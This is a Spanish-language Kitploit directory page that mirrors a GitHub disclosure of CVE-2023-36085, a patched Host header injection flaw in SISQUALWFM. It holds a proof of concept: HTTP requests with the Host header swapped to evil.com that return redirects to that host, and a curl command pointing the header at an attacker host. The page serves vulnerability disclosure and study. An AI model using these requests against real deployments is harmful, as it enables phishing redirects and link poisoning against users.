Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — Este repositorio contiene información relacionada con CVE-2023-36085, una vulnerabilidad de inyección de cabecera de host descubierta en SISQUALWFM versión 7.1.319.103, que permite a un atacante manipular enlaces de páginas web o redirigir a los usuarios a un sitio malicioso. A esta vulnerabilidad se le asignó CVE-2023-36085 y ha sido corregida en la versión 7.1.319.111 y superiores. | Kitploit
Herramientas/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
hace 2 añosAún no revisado

Acerca de

Este repositorio contiene información relacionada con CVE-2023-36085, una vulnerabilidad de inyección de cabecera de host descubierta en SISQUALWFM versión 7.1.319.103, que permite a un atacante manipular enlaces de páginas web o redirigir a los usuarios a un sitio malicioso. A esta vulnerabilidad se le asignó CVE-2023-36085 y ha sido corregida en la versión 7.1.319.111 y superiores.

Compartir

CVE-2023-36085 Vulnerabilidad de Inyección de Cabecera Host en SISQUALWFM

Este repositorio contiene información relacionada con una vulnerabilidad de inyección de cabecera Host descubierta en SISQUALWFM versión 7.1.319.103, que permite a un atacante manipular enlaces de páginas web o redirigir a los usuarios a un sitio malicioso. A esta vulnerabilidad se le asignó el CVE-2023-36085 y se ha corregido en la versión 7.1.319.111 y superiores.

Detalles de la Vulnerabilidad

  • Título del Exploit: Inyección de Cabecera Host en SISQUALWFM 7.1.319.103
  • Fecha de Descubrimiento: 17/03/2023
  • Fecha de Reporte: 17/03/2023
  • Fecha de Resolución: 13/10/2023
  • Autor del Exploit: Omer Shaik (unknown_exploit)
  • Página del Proveedor: SISQUALWFM
  • Versión: 7.1.319.103
  • Probado en: SISQUAL WFM 7.1.319.103
  • Versión Afectada: SISQUALWFM 7.1.319.103
  • Versión Corregida: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • Puntuación CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Categoría: Aplicaciones Web

Prueba de Concepto

Proporcionamos un escenario de prueba de concepto que demuestra la vulnerabilidad de inyección de cabecera Host, específicamente dirigido al endpoint /sisqualIdentityServer/core. Esta vulnerabilidad permite a un atacante manipular enlaces de páginas web o redirigir a los usuarios a otro sitio alterando la cabecera Host.

Solicitud Original

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

Respuesta Original

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

Solicitud Interceptada (Modificada para Redirigir a evil.com)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

Respuesta

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Exploit Execution

Método de Ataque

Para explotar esta vulnerabilidad, un atacante puede usar el siguiente comando curl para modificar la cabecera Host:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

Descargo de Responsabilidad

Este repositorio es solo para fines informativos y no debe utilizarse para ninguna actividad maliciosa. La vulnerabilidad ha sido divulgada de manera responsable al proveedor y el problema ha sido resuelto. Es crucial seguir las pautas de hacking ético y respetar las prácticas de divulgación responsable al identificar y reportar vulnerabilidades.

Descargar herramienta